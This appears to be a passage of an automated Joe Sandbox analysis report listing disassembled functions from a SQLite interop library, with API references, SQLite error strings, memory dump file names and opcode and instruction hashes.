                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 013ef8d2c12d3ac53c069b982337849fe25a476d9caaae268f1fcafae86378e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65E0CD37B647146B4600EB75EC01C877798CB44778B404061FF4DEB642FE38E61102E6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B1C5,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57228
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57221
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57212
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5721C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 80d24a180a108e285ed8c47301cda66eff9285d29f265bfe20ab98c1ecd93ee9
                                                                                                                                                                                                                                      • Instruction ID: fa233301ceb19eec2cf7bc3fd389d840de288d79d4e0984851ed05db9950bdbf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80d24a180a108e285ed8c47301cda66eff9285d29f265bfe20ab98c1ecd93ee9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4D0C2226A422826860026B56C02D973B888A00A79B4000A2FA4CEA542FA48962001E6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000138CC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC54100
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC540F9
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC540EA
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC540F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 1f4885e435b9ceaee34da9dae94fc311aec67a4c7265487de31667bd3059c0bb
                                                                                                                                                                                                                                      • Instruction ID: fdd3000bad6af39ac19c339ae5e3733ff993e49f16db5d4b760cec41dc8ea90e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f4885e435b9ceaee34da9dae94fc311aec67a4c7265487de31667bd3059c0bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4D0A7716643086BC600FBA4AC02D433FE89700B18B0400A0B50CEF143F918D6201071
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000138DA,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC540C0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC540B9
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC540AA
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC540B4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: def68ac3795d4a23f26fde16c921a71552c90e4774db3b848b6bd39964229b1b
                                                                                                                                                                                                                                      • Instruction ID: 9a9c05f99e75c02c777c9cd81c5b7010f3e33de9f6442dce8c46df3c74a10939
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: def68ac3795d4a23f26fde16c921a71552c90e4774db3b848b6bd39964229b1b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82D0C771768308AB9600ABE4DD42D477BD89754B28B0400A4B50DEF587F95DE6245175
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00035481,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,6BC64773), ref: 6BC52853
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5284C
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC52847
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC52841
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 3a74c377ff0f83e6cffa752215a19bf52619f9fb294e11e408a0648b1558413a
                                                                                                                                                                                                                                      • Instruction ID: b4303ca1e06711077a7d05e3cecb93c3e4dd3f2ebfbbdd6e836eabe7da61c685
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a74c377ff0f83e6cffa752215a19bf52619f9fb294e11e408a0648b1558413a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7B092E19A41403BE4146B649E0BF2325088320A29F110098790AAE1C7BE4C4A1801B3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B08A,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,6BCDD0C0), ref: 6BC52823
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5281C
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC52811
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC52817
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: a51a27e717a8c81b8c69da11bcf764e291c950fedddea1855a5bdde08ad48223
                                                                                                                                                                                                                                      • Instruction ID: 86414834bdecec89033fbdfa60c0f56a6cdbdf8b0c9ef33af9616661443c91b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a51a27e717a8c81b8c69da11bcf764e291c950fedddea1855a5bdde08ad48223
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02B092E19645447BE8146B649D0BE631818C390B2AF1000AC7957AE1C7BD4C4A182172
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000E,%s at line %d of [%.10s],cannot open file,0000EAA9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,6BC82A1E), ref: 6BC527F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC527EC
                                                                                                                                                                                                                                      • cannot open file, xrefs: 6BC527E7
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC527E1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$cannot open file$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-1856461355
                                                                                                                                                                                                                                      • Opcode ID: 584b206bee38f130656b19ff6b3b12e394c39dc1810d54d59a3a9aa5e11391f0
                                                                                                                                                                                                                                      • Instruction ID: 00fa5d513299f462ec604d5dd8fb71383bf86242f2b6935b2dfcb46ffaf0cd93
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 584b206bee38f130656b19ff6b3b12e394c39dc1810d54d59a3a9aa5e11391f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6B092D29A41803BF4146B74DE07F230408C310A29F100599780ABE2C7BD8C8A984172
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP(00000000), ref: 6BC4CC88
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iffb8076c269e2a85.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1579666890-0
                                                                                                                                                                                                                                      • Opcode ID: 5854f4884815835e326f65c5a3d8c4674f5f47a16281f4f15a181ab6ad9c4fb6
                                                                                                                                                                                                                                      • Instruction ID: fe3dcc369a592058a1b72745597ac5566c8d5cfd83188e508c678495e46ac906
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5854f4884815835e326f65c5a3d8c4674f5f47a16281f4f15a181ab6ad9c4fb6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16D1D071E251158FDB04CFA8C4806AFBBB1FB45314F1580AAE855AB361F73D9B89CB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI9a326fe0ddbebf12.SQLITE.INTEROP(?,00000000,?,?,00000000,?,?,?), ref: 6BC1751B
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,00000000,?,?,?), ref: 6BC1752A
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC17617
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC176C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$I9a326fe0ddbebf12.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1009568106-0
                                                                                                                                                                                                                                      • Opcode ID: 5e14eb54a6ed4c46e7d14a189a394f531bfb6e205610711e140f17605756cf97
                                                                                                                                                                                                                                      • Instruction ID: cb258044af7f0eb510e711ee538dd511cbfbb5529c23f2a20d659d9ae595b1ef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e14eb54a6ed4c46e7d14a189a394f531bfb6e205610711e140f17605756cf97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC8183F19182059FD710CF68D880A5BB7E4BF49314F10856EF859A7301F739EA15DBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC2D1E4
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,6BD087D4,6BC8DA3D,?), ref: 6BC2D32F
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2D3B1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1480580083-0
                                                                                                                                                                                                                                      • Opcode ID: ea2129a3eff66618a711d39f0029aa65fb99054376f71f91636a187321f23d88
                                                                                                                                                                                                                                      • Instruction ID: 6d70d5a2fe359afd81d1e8d0395027a682a2894bb7badd9ac66b330144d3349c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea2129a3eff66618a711d39f0029aa65fb99054376f71f91636a187321f23d88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5A177B0969340CFC725CF18C48199BB7F0FF99304F10499EE8998B215E739EA85CB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC1CF40: _memset.LIBCMT ref: 6BC1CF96
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC261B0
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC263A7
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC263B4
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC263E2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1480580083-0
                                                                                                                                                                                                                                      • Opcode ID: 50ae08dbd0260eabfd6ee5ac8163ac727e8fe1fca5526236fd7bb40ff4ba7855
                                                                                                                                                                                                                                      • Instruction ID: 13083d83bdba66b8e65fff5c841dd8ac15a13dcbb43c19bc42516af73a490d37
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50ae08dbd0260eabfd6ee5ac8163ac727e8fe1fca5526236fd7bb40ff4ba7855
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 757112B1A25B128BD700CF68C88171EB7E4BF84718F144678F99597241F739EA09CBE2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC10DF6
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC10E50
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC10F4C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 372259789-0
                                                                                                                                                                                                                                      • Opcode ID: 1efa8babdefc6b52959b1bed1c3032894939e00059a2f52cffccd0fd75a8ead8
                                                                                                                                                                                                                                      • Instruction ID: ff2b4263f26fe30af7d2018415b818419459a44bb2bd6a1fa5b6a4d5687abec7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1efa8babdefc6b52959b1bed1c3032894939e00059a2f52cffccd0fd75a8ead8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B961CF70628704CBD721DF29D8817EBB3E4FF45718F004959D8AAE7200FB39AA65DB52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC443F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
